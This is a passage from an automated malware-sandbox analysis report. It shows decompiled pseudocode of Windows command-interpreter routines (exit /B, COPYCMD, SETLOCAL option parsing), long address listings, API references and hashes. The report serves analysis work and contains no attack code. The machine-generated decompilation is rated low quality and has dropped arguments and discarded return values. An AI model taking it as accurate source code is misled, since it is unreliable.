					if(_t199 - _t217 >> 1 > 0x7fe7) {
						goto L49;
					}
					_t244 = _t254;
					_t27 =  &(_t244[1]); // -1
					_t202 = _t27;
					do {
						_t147 =  *_t244;
						_t244 =  &(_t244[1]);
					} while (_t147 != 0);
					_t246 = _t244 - _t202 >> 1;
					_t148 = E002B22C0(_t162, _t254);
					_t28 = _t246 + 1; // -4
					E002B1040(_t254, _t28, _t148);
					_t150 = _t254[1] & 0x0000ffff;
					_t227 = 0x3a;
					if(_t150 != _t227) {
						_t205 = 0x5c;
						__eflags =  *_t254 - _t205;
						if( *_t254 != _t205) {
							L61:
							_t206 = _v28;
							__eflags = _t206;
							if(_t206 == 0) {
								_t206 =  &_v548;
							}
							 *_t206 =  *((intOrPtr*)( *0x2e3cec));
							_t153 = _v28;
							__eflags = _t153;
							if(_t153 == 0) {
								_t153 =  &_v548;
							}
							 *((short*)(_t153 + 2)) = _t227;
							_t154 = _v28;
							__eflags = _t154;
							if(_t154 == 0) {
								_t154 =  &_v548;
							}
							 *((short*)(_t154 + 4)) = 0;
							_t208 = _v28;
							__eflags = _t208;
							if(_t208 == 0) {
								_t208 =  &_v548;
							}
							_t228 = _t208 + 2;
							__eflags = 0;
							do {
								_t155 =  *_t208;
								_t208 = _t208 + 2;
								__eflags = _t155;
							} while (_t155 != 0);
							_t209 = _t208 - _t228;
							__eflags = _t209;
							_t229 = _t254;
							_t210 = _t209 >> 1;
							_t73 =  &(_t229[1]); // 0x1
							_t248 = _t73;
							do {
								_t156 =  *_t229;
								_t229 =  &(_t229[1]);
								__eflags = _t156 - _v556;
							} while (_t156 != _v556);
							_t217 = _t229 - _t248 >> 1;
							__eflags = _t210 + 1 + (_t229 - _t248 >> 1) - 0x7fe7;
							if(__eflags > 0) {
								goto L49;
							}
							E002B0CF2(_t217, _t254);
							goto L19;
						}
						__eflags = _t150 - _t205;
						if(_t150 == _t205) {
							goto L18;
						}
						goto L61;
					}
					L18:
					E002B0D89(_t227, _t254);
					goto L19;
				} else {
					goto L1;
				}
				do {
					L1:
					_t161 =  *_t162 & 0x0000ffff;
					_t162 =  &(_t162[1]);
				} while (_t161 != 0);
				goto L2;
			}




















































































                                              0x002b5fd3
                                              0x002b5fda
                                              0x002b5fe0
                                              0x002b5fea
                                              0x002b5ff6
                                              0x002b6005
                                              0x002b6007
                                              0x002b6016
                                              0x002b6023
                                              0x002b602e
                                              0x002b603b
                                              0x002b6048
                                              0x002b6048
                                              0x002b604a
                                              0x002b604c
                                              0x002b604c
                                              0x002b604f
                                              0x002b604f
                                              0x002b6052
                                              0x002b6055
                                              0x002b605a
                                              0x002b605c
                                              0x002b605e
                                              0x002bf576
                                              0x002bf576
                                              0x002bf57f
                                              0x002bf57f
                                              0x002bf584
                                              0x002bf584
                                              0x00000000
                                              0x002bf584
                                              0x002b606a
                                              0x00000000
                                              0x00000000
                                              0x002b6070
                                              0x002b6072
                                              0x002b6072
                                              0x002b6075
                                              0x002b6075
                                              0x002b6078
                                              0x002b607b
                                              0x002b6084
                                              0x002b6086
                                              0x002b608c
                                              0x002b608c
                                              0x002b6091
                                              0x002b6098
                                              0x002b60a3
                                              0x002b60a8
                                              0x002bf58b
                                              0x00000000
                                              0x002bf58b
                                              0x002b60b0
                                              0x002b60b9
                                              0x002b60c4
                                              0x002b60c8
                                              0x002b60ee
                                              0x002bf593
                                              0x00000000
                                              0x002bf593
                                              0x002b60f7
                                              0x002b60fd
                                              0x002bf59a
                                              0x002bf59d
                                              0x002bf59f
                                              0x002bf5a1
                                              0x002bf5a1
                                              0x002bf5af
                                              0x002bf5b2
                                              0x002bf5b5
                                              0x002bf5b7
                                              0x002bf5b9
                                              0x002bf5b9
                                              0x002bf5c1
                                              0x002bf5c2
                                              0x002bf5c6
                                              0x002bf5c9
                                              0x002bf5cb
                                              0x002bf5cd
                                              0x002bf5cd
                                              0x002bf5d5
                                              0x002b6175
                                              0x002b6175
                                              0x002b6178
                                              0x002b617a
                                              0x002b618a
                                              0x00000000
                                              0x00000000
                                              0x002b6190
                                              0x002b619e
                                              0x002b61a2
                                              0x002b61aa
                                              0x002b61ae
                                              0x002bf685
                                              0x002b61b4
                                              0x002b61b4
                                              0x002b61b4
                                              0x002b61bb
                                              0x002b61c6
                                              0x002b61ca
                                              0x002b61ca
                                              0x002b61de
                                              0x002b61de
                                              0x002b61e3
                                              0x002b61e8
                                              0x002bf690
                                              0x002bf690
                                              0x002b61ee
                                              0x002b61f6
                                              0x002b61fa
                                              0x002b6201
                                              0x00000000
                                              0x002b6207
                                              0x002b6208
                                              0x002b620a
                                              0x002b620f
                                              0x002b6215
                                              0x002b621d
                                              0x002b621f
                                              0x002b6221
                                              0x002b6224
                                              0x002b6229
                                              0x002b623a
                                              0x002b623c
                                              0x002b6240
                                              0x002bf69b
                                              0x002bf69f
                                              0x002bf69f
                                              0x002bf6a0
                                              0x002bf6a3
                                              0x002bf6a3
                                              0x002bf6a6
                                              0x002bf6a9
                                              0x002bf6a9
                                              0x002bf6b8
                                              0x002bf6b8
                                              0x002b6247
                                              0x002b6250
                                              0x002b628d
                                              0x002b628f
                                              0x002b6294
                                              0x002b6296
                                              0x002b6296
                                              0x002b626a
                                              0x002b626c
                                              0x002b62a2
                                              0x002b62a5
                                              0x002b62aa
                                              0x002b62ac
                                              0x002b62ae
                                              0x002b62b0
                                              0x002b62b0
                                              0x002b62b3
                                              0x002b62b3
                                              0x002b62b6
                                              0x002b62b9
                                              0x002b62b9
                                              0x002b62be
                                              0x002b62c0
                                              0x002b62c0
                                              0x002b62c2
                                              0x002b62c4
                                              0x002b62c7
                                              0x002b62c7
                                              0x002b62ca
                                              0x002b62cd
                                              0x002b62cd
                                              0x002b62d8
                                              0x002b62df
                                              0x002b62e4
                                              0x00000000
                                              0x00000000
                                              0x002b62ea
                                              0x002b62f0
                                              0x002b62f0
                                              0x002b6271
                                              0x002b627d
                                              0x002b628a
                                              0x002b628a
                                              0x002b6252
                                              0x002b6258
                                              0x002b625f
                                              0x00000000
                                              0x002bf6c2
                                              0x002bf6c2
                                              0x002bf6c5
                                              0x00000000
                                              0x00000000
                                              0x002bf57d
                                              0x00000000
                                              0x002bf57d
                                              0x002b625f
                                              0x002b622d
                                              0x002b622d
                                              0x002b622f
                                              0x002b6232
                                              0x002b6237
                                              0x00000000
                                              0x002b6237
                                              0x002b6201
                                              0x002b6103
                                              0x002b610d
                                              0x00000000
                                              0x00000000
                                              0x002b6113
                                              0x002b6116
                                              0x002b6116
                                              0x002b6119
                                              0x002b611c
                                              0x002b612b
                                              0x00000000
                                              0x00000000
                                              0x002b6131
                                              0x002b6135
                                              0x002b6135
                                              0x002b6138
                                              0x002b6138
                                              0x002b613b
                                              0x002b613e
                                              0x002b6147
                                              0x002b6149
                                              0x002b614f
                                              0x002b6154
                                              0x002b6159
                                              0x002b615f
                                              0x002b6163
                                              0x002bf5e0
                                              0x002bf5e1
                                              0x002bf5e4
                                              0x002bf5ef
                                              0x002bf5ef
                                              0x002bf5f2
                                              0x002bf5f4
                                              0x002bf5f6
                                              0x002bf5f6
                                              0x002bf604
                                              0x002bf607
                                              0x002bf60a
                                              0x002bf60c
                                              0x002bf60e
                                              0x002bf60e
                                              0x002bf614
                                              0x002bf618
                                              0x002bf61b
                                              0x002bf61d
                                              0x002bf61f
                                              0x002bf61f
                                              0x002bf627
                                              0x002bf62b
                                              0x002bf62e
                                              0x002bf630
                                              0x002bf632
                                              0x002bf632
                                              0x002bf638
                                              0x002bf63b
                                              0x002bf63d
                                              0x002bf63d
                                              0x002bf640
                                              0x002bf643
                                              0x002bf643
                                              0x002bf648
                                              0x002bf648
                                              0x002bf64a
                                              0x002bf64c
                                              0x002bf64e
                                              0x002bf64e
                                              0x002bf651
                                              0x002bf651
                                              0x002bf654
                                              0x002bf657
                                              0x002bf657
                                              0x002bf665
                                              0x002bf669
                                              0x002bf66e
                                              0x00000000
                                              0x00000000
                                              0x002bf67b
                                              0x00000000
                                              0x002bf67b
                                              0x002bf5e6
                                              0x002bf5e9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bf5e9
                                              0x002b6169
                                              0x002b6170
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b603d
                                              0x002b603d
                                              0x002b603d
                                              0x002b6040
                                              0x002b6043
                                              0x00000000

                                              APIs
                                                • Part of subcall function 002B3320: _wcsnicmp.MSVCRT ref: 002B33A4
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEAB7
                                                • Part of subcall function 002AEA40: iswspace.MSVCRT ref: 002AEB2D
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB49
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB6D
                                                • Part of subcall function 002B62FA: _wcsnicmp.MSVCRT ref: 002B6367
                                                • Part of subcall function 002B62FA: _wcsnicmp.MSVCRT ref: 002BF6F6
                                              • memset.MSVCRT ref: 002B60C8
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00007EE3,00000001), ref: 002B620F
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 002B6247
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002B6252
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B6271
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                              • String ID: COPYCMD
                                              • API String ID: 1068965577-3727491224
                                              • Opcode ID: 827c91471a9aeaef6ca5007b3dc2b523795f6a9eaa820b541a6d5ebd8443d899
                                              • Instruction ID: 37abd6393cf080a1b4e5c4ac9585e4a671354c9d8ca81402e6f1cb8bd457867d
                                              • Opcode Fuzzy Hash: 827c91471a9aeaef6ca5007b3dc2b523795f6a9eaa820b541a6d5ebd8443d899
                                              • Instruction Fuzzy Hash: F0D10735A201168BCB24DF68DC996FAB3F5EF58380F5845A9DC06D7291EB34EE61CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A5E70, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 292COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E002A5E70(void* __ecx, signed int* _a4) {
				signed int _v8;
				short _v24;
				short _v26;
				short _v28;
				signed short _v29;
				signed int _v36;
				signed int _v40;
				signed short* _v44;
				intOrPtr _v48;
				int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				signed int _t100;
				intOrPtr _t104;
				signed int _t107;
				short* _t117;
				signed int _t118;
				signed short* _t120;
				signed short _t122;
				signed int _t124;
				signed int _t129;
				signed int _t132;
				signed short _t133;
				signed int _t135;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				short _t148;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t162;
				void* _t163;
				signed short _t165;
				signed short _t170;
				void* _t173;
				signed int _t174;
				signed int _t177;
				intOrPtr _t178;
				void* _t189;
				signed short* _t200;
				signed int _t204;
				void* _t205;
				void* _t206;
				signed int* _t212;
				void* _t213;
				void* _t214;
				signed int _t216;
				wchar_t* _t219;
				int _t220;
				void* _t221;
				signed int _t223;
				signed int* _t225;
				signed int _t230;
				signed int _t234;

				_t230 = _t234;
				_push(__ecx);
				_push(__ecx);
				_t212 = _a4;
				_t162 = 0;
				_t219 = _t212[0xf];
				if(_t219 == 0) {
					L15:
					if( *_t212 != 0x14) {
						goto L65;
					} else {
						goto L16;
					}
				} else {
					_t205 = 0x20;
					while(1) {
						_t80 =  *_t219 & 0x0000ffff;
						if(_t80 == 0 || _t80 > _t205) {
							break;
						}
						_t219 =  &(_t219[0]);
						__eflags = _t219;
						if(_t219 != 0) {
							continue;
						} else {
						}
						break;
					}
					if(_t219 == 0) {
						goto L15;
					} else {
						__imp___wcsnicmp(_t219, L"/B", 2);
						_t234 = _t234 + 0xc;
						if(_t80 != 0) {
							L11:
							if(_t219 != 0) {
								_t80 = swscanf(_t219, L"%d",  &_v8);
								_t234 = _t234 + 0xc;
								if(_t80 == 1) {
									_t80 = _v8;
									 *0x2db8b0 = _t80;
									if( *0x2e3ccc != _t162) {
										_t162 = _t80;
									}
								}
							}
							goto L15;
						} else {
							 *_t212 = 0x14;
							_t212[0xf] = L":EOF";
							_t219 =  &(_t219[1]);
							if(_t219 == 0) {
								L16:
								if( *0x2e3cc4 == 0) {
									L65:
									_t170 =  *0x2d3874;
									E002AC7F7(_t80, _t170);
									_t220 =  *0x2db8b0;
									do {
										__eflags = E002B4B60(__eflags, 0);
									} while (__eflags == 0);
									exit(_t220);
									asm("int3");
									_t83 =  *(_t162 + 0xc);
									__eflags = _t83;
									if(_t83 != 0) {
										do {
											_t216 = _t83;
											_v40 = _t216;
											_t83 =  *(_t216 + 0xc);
											__eflags = _t83;
										} while (_t83 != 0);
										_t212 = _v36;
										_t162 = _v40;
									}
									_t84 =  *_t220 & 0x0000ffff;
									__eflags = _t84;
									if(_t84 == 0) {
										L38:
										_t85 = 0;
										__eflags = 0;
										goto L39;
									} else {
										while(1) {
											_t207 = 0x2f;
											_v29 = _t170;
											__eflags = _t84 - _t207;
											if(_t84 != _t207) {
												goto L36;
											}
											_t7 = _t220 + 4; // 0x4
											_t117 = _t7;
											_t165 = _t170;
											__eflags =  *_t117 - 0x2d;
											_v52 = _t117;
											if( *_t117 == 0x2d) {
												_v29 = 1;
												_t165 = 1;
											}
											_t118 = _t165 & 0x0000ffff;
											_v36 = _t118;
											_t120 = _t220 + (_t118 + 2) * 2;
											_v44 = _t120;
											_t122 = towupper( *_t120 & 0x0000ffff);
											_pop(_t196);
											_t124 = (_t122 & 0x0000ffff) - 0x3f;
											__eflags = _t124;
											if(__eflags == 0) {
												E002C9373(_t207, __eflags);
												__eflags = 0;
												_push(0);
												_push(0x2381);
												E002AC108(_t196);
												 *0x2e8065 = 0;
												 *0x2e851c = 0;
												goto L93;
											} else {
												_t129 = _t124;
												__eflags = _t129;
												if(_t129 == 0) {
													__eflags = _v29;
													if(_v29 == 0) {
														_t207 = _t212;
														_t132 = E002C9CFA(_t220 + (_v36 + 3) * 2, _t212);
														__eflags = _t132;
														if(_t132 != 0) {
															goto L93;
														} else {
															__eflags = _t212[2] & 0x00000001;
															if((_t212[2] & 0x00000001) != 0) {
																 *_t212 =  *_t212 | 0x00001000;
															}
															goto L33;
														}
													} else {
														_t200 = _v44;
														_t207 =  &(_t200[1]);
														do {
															_t133 =  *_t200;
															_t200 =  &(_t200[1]);
															__eflags = _t133 - _v48;
														} while (_t133 != _v48);
														_t196 = _t200 - _t207 >> 1;
														__eflags = _t200 - _t207 >> 1 - 1;
														if(_t200 - _t207 >> 1 > 1) {
															goto L89;
														} else {
															_t212[1] = 6;
															_t212[2] = 0;
															goto L33;
														}
													}
												} else {
													_t139 = _t129 - 5;
													__eflags = _t139;
													if(_t139 == 0) {
														__eflags = _v29;
														_t140 =  *_t212;
														if(_v29 != 0) {
															_t141 = _t140 ^ 0x00001000;
														} else {
															_t141 = _t140 | 0x00001000;
															__eflags = _t141;
														}
														goto L32;
													} else {
														_t143 = _t139 - 0xa;
														__eflags = _t143;
														if(_t143 == 0) {
															__eflags = _v29;
															_t144 =  *_t212;
															if(_v29 == 0) {
																_t141 = _t144 | 0x00000800;
															} else {
																_t141 = _t144 ^ 0x00000800;
															}
															goto L32;
														} else {
															_t145 = _t143 - 1;
															__eflags = _t145;
															if(_t145 != 0) {
																__eflags = _t145 != 0;
																if(_t145 != 0) {
																	_t148 = 0x2f;
																	_v28 = _t148;
																	_v26 =  *((intOrPtr*)(_t220 + 4));
																	_v24 = 0;
																	_push(_t220 + ((_t165 & 0x0000ffff) + 2) * 2);
																	_push(1);
																	_push(0x2375);
																	goto L91;
																} else {
																	__eflags = _v29;
																	_t154 =  *_t212;
																	if(_v29 != 0) {
																		_t155 = _t154 ^ 0x00000010;
																	} else {
																		_t155 = _t154 | 0x00000010;
																		__eflags = _t155;
																	}
																	 *_t212 = _t155;
																	_t156 = _v36;
																	__eflags =  *(_t220 + 6 + _t156 * 2);
																	if( *(_t220 + 6 + _t156 * 2) == 0) {
																		goto L33;
																	} else {
																		_t204 = (_t165 & 0x0000ffff) + 2;
																		_t196 = _t220 + _t204 * 2;
																		_push(_t220 + _t204 * 2);
																		goto L90;
																	}
																}
															} else {
																__eflags = _v29;
																_t157 =  *_t212;
																if(_v29 != 0) {
																	_t141 = _t157 ^ 0x00002000;
																} else {
																	_t141 = _t157 | 0x00002000;
																}
																L32:
																 *_t212 = _t141;
																_t196 = 0;
																_t142 = _v36;
																__eflags =  *(_t220 + 6 + _t142 * 2);
																if( *(_t220 + 6 + _t142 * 2) != 0) {
																	L89:
																	_t135 = (_t165 & 0x0000ffff) + 2;
																	__eflags = _t135;
																	_push(_t220 + _t135 * 2);
																	L90:
																	_push(1);
																	_push(0x2376);
																	L91:
																	E002AC5A2(_t196);
																	L93:
																	_t85 = 1;
																	L39:
																	_pop(_t213);
																	_pop(_t221);
																	__eflags = _v8 ^ _t230;
																	_pop(_t163);
																	return E002B6FD0(_t85, _t163, _v8 ^ _t230, _t207, _t213, _t221);
																} else {
																	L33:
																	_t220 = _v52;
																	_t162 = _v40;
																	L34:
																	_t220 = E002AD7E6(_t220);
																	_t84 =  *_t220 & 0x0000ffff;
																	__eflags = _t84;
																	if(_t84 == 0) {
																		goto L38;
																	} else {
																		_t170 = 0;
																		continue;
																	}
																}
															}
														}
													}
												}
											}
											goto L102;
											L36:
											_t87 = _t212[0x12];
											__eflags = _t87;
											if(_t87 != 0) {
												_t173 = 0x10;
												_t88 = E002B00B0(_t173);
												__eflags = _t88;
												if(_t88 == 0) {
													E002C9287(_t173);
													__imp__longjmp(0x2db8b8, 1);
													asm("int3");
													_t174 = 0x2e3ab0;
													__eflags = 0;
													do {
														_t90 =  *_t174;
														_t174 = _t174 + 2;
														__eflags = _t90;
													} while (_t90 != 0);
													_t214 = (_t174 - 0x2e3ab2 >> 1) + 1;
													_t223 = HeapAlloc(GetProcessHeap(), 8, 0xc);
													__eflags = _t223;
													if(_t223 == 0) {
														L96:
														_t94 = 1;
													} else {
														_t177 = HeapAlloc(GetProcessHeap(), 8, _t214 + _t214);
														 *_t223 = _t177;
														__eflags = _t177;
														if(_t177 == 0) {
															goto L96;
														} else {
															_t98 =  *0x2e3cb8;
															__eflags = _t98;
															if(_t98 == 0) {
																_t98 = 0x2e3ab0;
															}
															E002B1040(_t177, _t214, _t98);
															_t100 = E002B3B2C(_t177);
															 *(_t223 + 4) = _t100;
															__eflags = _t100;
															if(_t100 == 0) {
																goto L96;
															} else {
																_t178 =  *0x2e3cc4;
																 *((char*)(_t223 + 8)) =  *0x2e3cc9;
																 *((char*)(_t223 + 9)) =  *0x2e3cc8;
																 *(_t178 + 0x90 +  *(_t178 + 0x14) * 4) = _t223;
																_t104 =  *0x2e3cd8;
																 *(_t178 + 0x14) =  *(_t178 + 0x14) + 1;
																 *((intOrPtr*)(_t178 + 0xc)) = _t104;
																__eflags =  *((intOrPtr*)(_t178 + 0x10)) - _t104;
																if( *((intOrPtr*)(_t178 + 0x10)) < _t104) {
																	 *((intOrPtr*)(_t178 + 0x10)) = _t104;
																}
																_t225 = E002AEA40( *((intOrPtr*)( *((intOrPtr*)(_t162 + 8)) + 0x3c)), 0, 0);
																_t107 = 0;
																 *0x2db8b0 = 0;
																while(1) {
																	__eflags =  *_t225 - _t107;
																	if( *_t225 == _t107) {
																		break;
																	}
																	__imp___wcsicmp(_t225, L"ENABLEEXTENSIONS");
																	__eflags = _t107;
																	if(_t107 != 0) {
																		__imp___wcsicmp(_t225, L"DISABLEEXTENSIONS");
																		__eflags = _t107;
																		if(_t107 == 0) {
																			 *0x2e3cc9 = 0;
																			goto L58;
																		} else {
																			__imp___wcsicmp(_t225, L"ENABLEDELAYEDEXPANSION");
																			__eflags = _t107;
																			if(_t107 != 0) {
																				__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
																				_t189 = _t225;
																				__eflags = _t107;
																				if(_t107 != 0) {
																					__eflags =  *_t225;
																					if( *_t225 == 0) {
																						goto L58;
																					} else {
																						_push(0);
																						_push(0x400023a6);
																						E002AC5A2(_t189);
																						_t94 = 1;
																						 *0x2db8b0 = 1;
																					}
																				} else {
																					 *0x2e3cc8 = _t107;
																					goto L58;
																				}
																			} else {
																				 *0x2e3cc8 = 1;
																				goto L58;
																			}
																		}
																	} else {
																		 *0x2e3cc9 = 1;
																		L58:
																		_t225 = E002AD7E6(_t225);
																		_t107 = 0;
																		__eflags = 0;
																		continue;
																	}
																	goto L63;
																}
																_t94 = 0;
																__eflags = 0;
															}
														}
													}
													L63:
													return _t94;
												} else {
													 *(_t162 + 0xc) = _t88;
													_t162 = _t88;
													 *((intOrPtr*)(_t88 + 0xc)) = 0;
													_t87 = _t212[0x12];
													_v40 = _t162;
													goto L37;
												}
											} else {
												L37:
												_t212[0x12] = _t87 + 1;
												 *_t162 = E002B297B(E002B22C0(_t162, _t220));
												 *((char*)(_t162 + 8)) = 1;
												goto L34;
											}
											goto L102;
										}
									}
								} else {
									E002A6980(_t212);
									return _t162;
								}
							} else {
								_t206 = 0x20;
								while(1) {
									_t80 =  *_t219 & 0x0000ffff;
									if(_t80 == 0 || _t80 > _t206) {
										goto L11;
									}
									_t219 =  &(_t219[0]);
									if(_t219 != 0) {
										continue;
									}
									goto L11;
								}
								goto L11;
							}
						}
					}
				}
				L102:
			}









































































                                              0x002a5e73
                                              0x002a5e75
                                              0x002a5e76
                                              0x002a5e7a
                                              0x002a5e7d
                                              0x002a5e7f
                                              0x002a5e84
                                              0x002a5f0d
                                              0x002a5f10
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a5e8a
                                              0x002a5e8c
                                              0x002a5e8d
                                              0x002a5e8d
                                              0x002a5e93
                                              0x00000000
                                              0x00000000
                                              0x002a5f35
                                              0x002a5f35
                                              0x002a5f38
                                              0x00000000
                                              0x00000000
                                              0x002a5f3e
                                              0x00000000
                                              0x002a5f38
                                              0x002a5ea0
                                              0x00000000
                                              0x002a5ea2
                                              0x002a5eaa
                                              0x002a5eb0
                                              0x002a5eb5
                                              0x002a5edf
                                              0x002a5ee1
                                              0x002a5eed
                                              0x002a5ef3
                                              0x002a5ef9
                                              0x002a5efb
                                              0x002a5efe
                                              0x002a5f09
                                              0x002a5f0b
                                              0x002a5f0b
                                              0x002a5f09
                                              0x002a5ef9
                                              0x00000000
                                              0x002a5eb7
                                              0x002a5eb7
                                              0x002a5ebd
                                              0x002a5ec4
                                              0x002a5ec7
                                              0x002a5f16
                                              0x002a5f1d
                                              0x002ba76e
                                              0x002ba76e
                                              0x002ba774
                                              0x002ba779
                                              0x002ba77f
                                              0x002ba786
                                              0x002ba786
                                              0x002ba78b
                                              0x002ba791
                                              0x002ba792
                                              0x002ba795
                                              0x002ba797
                                              0x002ba79d
                                              0x002ba79d
                                              0x002ba79f
                                              0x002ba7a2
                                              0x002ba7a5
                                              0x002ba7a5
                                              0x002ba7a9
                                              0x002ba7ac
                                              0x002ba7ac
                                              0x002ac2db
                                              0x002ac2de
                                              0x002ac2e1
                                              0x002ac3c8
                                              0x002ac3c8
                                              0x002ac3c8
                                              0x00000000
                                              0x00000000
                                              0x002ac2e7
                                              0x002ac2e9
                                              0x002ac2ea
                                              0x002ac2ed
                                              0x002ac2f0
                                              0x00000000
                                              0x00000000
                                              0x002ac2f6
                                              0x002ac2f6
                                              0x002ac2f9
                                              0x002ac2fb
                                              0x002ac2ff
                                              0x002ac302
                                              0x002ba7b6
                                              0x002ba7ba
                                              0x002ba7ba
                                              0x002ac308
                                              0x002ac30b
                                              0x002ac311
                                              0x002ac314
                                              0x002ac31b
                                              0x002ac324
                                              0x002ac325
                                              0x002ac325
                                              0x002ac328
                                              0x002ba8c7
                                              0x002ba8cc
                                              0x002ba8ce
                                              0x002ba8cf
                                              0x002ba8d4
                                              0x002ba8db
                                              0x002ba8e1
                                              0x00000000
                                              0x002ac32e
                                              0x002ac32f
                                              0x002ac32f
                                              0x002ac332
                                              0x002ba7f0
                                              0x002ba7f4
                                              0x002ba829
                                              0x002ba831
                                              0x002ba836
                                              0x002ba838
                                              0x00000000
                                              0x002ba83e
                                              0x002ba83e
                                              0x002ba842
                                              0x002ba848
                                              0x002ba848
                                              0x00000000
                                              0x002ba842
                                              0x002ba7f6
                                              0x002ba7f6
                                              0x002ba7f9
                                              0x002ba7fc
                                              0x002ba7fc
                                              0x002ba7ff
                                              0x002ba802
                                              0x002ba802
                                              0x002ba80a
                                              0x002ba80c
                                              0x002ba80f
                                              0x00000000
                                              0x002ba815
                                              0x002ba817
                                              0x002ba81e
                                              0x00000000
                                              0x002ba81e
                                              0x002ba80f
                                              0x002ac338
                                              0x002ac338
                                              0x002ac338
                                              0x002ac33b
                                              0x002ac362
                                              0x002ac366
                                              0x002ac368
                                              0x002ba7e6
                                              0x002ac36e
                                              0x002ac36e
                                              0x002ac36e
                                              0x002ac36e
                                              0x00000000
                                              0x002ac33d
                                              0x002ac33d
                                              0x002ac33d
                                              0x002ac340
                                              0x002ba7ca
                                              0x002ba7ce
                                              0x002ba7d0
                                              0x002ba7dc
                                              0x002ba7d2
                                              0x002ba7d2
                                              0x002ba7d2
                                              0x00000000
                                              0x002ac346
                                              0x002ac346
                                              0x002ac346
                                              0x002ac349
                                              0x002ac3dc
                                              0x002ac3df
                                              0x002ba886
                                              0x002ba887
                                              0x002ba88f
                                              0x002ba895
                                              0x002ba8a2
                                              0x002ba8a3
                                              0x002ba8a5
                                              0x00000000
                                              0x002ac3e5
                                              0x002ac3e5
                                              0x002ac3e9
                                              0x002ac3eb
                                              0x002ac403
                                              0x002ac3ed
                                              0x002ac3ed
                                              0x002ac3ed
                                              0x002ac3ed
                                              0x002ac3f0
                                              0x002ac3f4
                                              0x002ac3f7
                                              0x002ac3fc
                                              0x00000000
                                              0x002ac3fe
                                              0x002ba87b
                                              0x002ba87e
                                              0x002ba881
                                              0x00000000
                                              0x002ba881
                                              0x002ac3fc
                                              0x002ac34f
                                              0x002ac34f
                                              0x002ac353
                                              0x002ac355
                                              0x002ba7c0
                                              0x002ac35b
                                              0x002ac35b
                                              0x002ac35b
                                              0x002ac373
                                              0x002ac373
                                              0x002ac375
                                              0x002ac377
                                              0x002ac37a
                                              0x002ac37f
                                              0x002ba8ac
                                              0x002ba8af
                                              0x002ba8af
                                              0x002ba8b5
                                              0x002ba8b6
                                              0x002ba8b6
                                              0x002ba8b8
                                              0x002ba8bd
                                              0x002ba8bd
                                              0x002ba8e7
                                              0x002ba8e9
                                              0x002ac3ca
                                              0x002ac3cd
                                              0x002ac3ce
                                              0x002ac3cf
                                              0x002ac3d1
                                              0x002ac3da
                                              0x002ac385
                                              0x002ac385
                                              0x002ac385
                                              0x002ac388
                                              0x002ac38b
                                              0x002ac392
                                              0x002ac394
                                              0x002ac397
                                              0x002ac39a
                                              0x00000000
                                              0x002ac39c
                                              0x002ac39c
                                              0x00000000
                                              0x002ac39c
                                              0x002ac39a
                                              0x002ac37f
                                              0x002ac349
                                              0x002ac340
                                              0x002ac33b
                                              0x002ac332
                                              0x00000000
                                              0x002ac3a3
                                              0x002ac3a3
                                              0x002ac3a6
                                              0x002ac3a8
                                              0x002ba855
                                              0x002ba856
                                              0x002ba85b
                                              0x002ba85d
                                              0x002ba8ef
                                              0x002ba8fb
                                              0x002ba901
                                              0x002ba902
                                              0x002ac471
                                              0x002ac473
                                              0x002ac473
                                              0x002ac476
                                              0x002ac479
                                              0x002ac479
                                              0x002ac486
                                              0x002ac496
                                              0x002ac498
                                              0x002ac49a
                                              0x002ba91a
                                              0x002ba91c
                                              0x002ac4a0
                                              0x002ac4b3
                                              0x002ac4b5
                                              0x002ac4b7
                                              0x002ac4b9
                                              0x00000000
                                              0x002ac4bf
                                              0x002ac4bf
                                              0x002ac4c4
                                              0x002ac4c6
                                              0x002ba922
                                              0x002ba922
                                              0x002ac4cf
                                              0x002ac4d4
                                              0x002ac4d9
                                              0x002ac4dc
                                              0x002ac4de
                                              0x00000000
                                              0x002ac4e4
                                              0x002ac4e4
                                              0x002ac4ef
                                              0x002ac4f7
                                              0x002ac4fd
                                              0x002ac504
                                              0x002ac509
                                              0x002ac50c
                                              0x002ac50f
                                              0x002ac512
                                              0x002ac514
                                              0x002ac514
                                              0x002ac527
                                              0x002ac529
                                              0x002ac52b
                                              0x002ac56c
                                              0x002ac56c
                                              0x002ac56f
                                              0x00000000
                                              0x00000000
                                              0x002ac577
                                              0x002ac57f
                                              0x002ac581
                                              0x002ac538
                                              0x002ac540
                                              0x002ac542
                                              0x002ac59b
                                              0x00000000
                                              0x002ac544
                                              0x002ac54a
                                              0x002ac552
                                              0x002ac554
                                              0x002ba932
                                              0x002ba939
                                              0x002ba93a
                                              0x002ba93c
                                              0x002ba94a
                                              0x002ba94d
                                              0x00000000
                                              0x002ba953
                                              0x002ba953
                                              0x002ba954
                                              0x002ba959
                                              0x002ba961
                                              0x002ba963
                                              0x002ba963
                                              0x002ba93e
